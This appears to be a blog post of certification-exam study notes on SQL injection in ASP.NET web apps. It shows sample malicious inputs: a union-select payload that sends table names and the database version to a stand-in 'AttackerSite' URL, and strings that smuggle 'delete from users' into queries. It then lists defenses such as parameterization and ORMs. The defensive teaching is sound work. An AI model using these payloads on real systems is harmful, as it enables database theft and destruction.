70-486 · Certification Test · Computer programming

SQL Injection Notes

What is SQL injection?  It’s where malicious users try to access your database from your website. Let’s take a look at some entries that can compromise your database and some solutions. 

You have a text box that takes a string to filter data.  What happens when the following strings are entered?

1) when the app sends the information in the query string

Example: x’ union select ‘http://AttackerSite?table=’ %2b name %2b @@version= %2b ”,name,’3′,’4′ from systables order by 2—%’

    -This will send a list of tables in the database to the attacker’s site.  You can see the data being sent if you have fiddler running OR right clicking on the page and selecting “View Source”.

2)  If you do a replace in you code to replace –,–, ‘ 

query = “select * from users where loginname=\”{0}\””;
    dangerousInput=”\”; delete from users -‘-“;
    dangerousInput.Replace(“–“,””)
        .Replace(“‘”,””);

3)  query = “select * from users where userid={0}”;
    dangerousInput = “3;delete from users;”
    dangerousInput.Replace(“-“,””)
        .Replace(“‘”,””);

4) Inline SQL

     You will need to set security on every table to limit the access to the table

5) Stored Procedures

    You don’t have to set the security for every table but make sure to parameterize the fields.

How to Prevent

– Ensure All calls are Parameterized.

– Store Procedure Calls

– Inline SQL (SQL in code)

– No concatenated strings

Var sql = string.Format(“select * from table where {0}”, fromWhereclause(userInput)”)

– You can use regular expression to limit the data that you except.

     example: regex.replace(searchText, “[^a-zA-z0-9 ]”, “”)

·-Use an ORM like Entity Framework

Tools to check how secure your site is:

   SQL Permission Auditor
       – use to check to a users permissions
       – can be found on CodePlex
   CAT.NET
   FXcop

References:

Adam Tuliper’s Hack-proofing Your ASP.NET Web Applications

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s